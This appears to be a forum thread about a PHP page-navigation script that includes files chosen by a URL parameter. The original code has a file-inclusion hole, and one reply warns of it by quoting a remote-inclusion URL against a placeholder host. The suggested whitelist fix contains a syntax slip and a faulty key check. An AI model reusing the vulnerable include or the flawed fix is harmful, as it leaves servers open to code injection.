php navigation (index.php?id=blah)

Mr_Chew

i have a simple php navigation script that works fine (index.php?id=blah)

I just made a subfolder called 'login' in my root directory to organize my news system files.

How do I use the php navigation system to access these files now that they're in the subfolder?

Currently this is what it is:

<?php
$page=$_GET['id'];

if ($page == '') 
{
		include 'news/main.php';

	} else { 

if (isset($_GET['id']) && file_exists($_GET[id].'.php')) 
	{
		include $_GET[id].'.php';
	} else {
		echo "<h2>The page you have requested does not exist on the server.</h2>";
	}
}
?>

I tried using http://mysite.com/index.php?id=login/news.php but that didn't work.

thank you

Horizon88

well, you have a few options:

include an array of allowed pages:

$pages = array('index'=>'index.php','login'=>'login/login.php');
if (in_array($_GET['id'], $pages)) {
   include($pages[$_GET['id']);
}

which would be called as navigation.php?id=index and navigation.php?id=login

Or you could switch to a more versatile system of managing pages than using an include() based on a get variable, if your site is going to get big enough to require breaking it into directories.

There's more, of course, but those are the two I can think of offhand when I'm tired. The first would probably be easiest if you only have a few pages, but you may want to consider a more robust rewrite/design of how you handle this.

wilku

There is a serious flaw in using file_exists($_GET[id].'.php') to check if the file can be included. As manual says, since PHP 5.0.0 this function works with some url wrappers. So lets imagine someone tricks your script to include his malicious code:

navigation.php?id=http://othersite.com/virus

http://othersite.com/virus.php can be prepared to serve some code that will infect your server. And I know it's possible because some years ago I was a subject of such attack.

Horizon88

wilku wrote:
There is a serious flaw in using file_exists($_GET[id].'.php') to check if the file can be included. As manual says, since PHP 5.0.0 this function works with some url wrappers. So lets imagine someone tricks your script to include his malicious code:
navigation.php?id=http://othersite.com/virus
http://othersite.com/virus.php can be prepared to serve some code that will infect your server. And I know it's possible because some years ago I was a subject of such attack.

Another good reason to implement the array of whitelisted pages, if it's not too large a site, or implement a different, more robust management scheme if it's too large.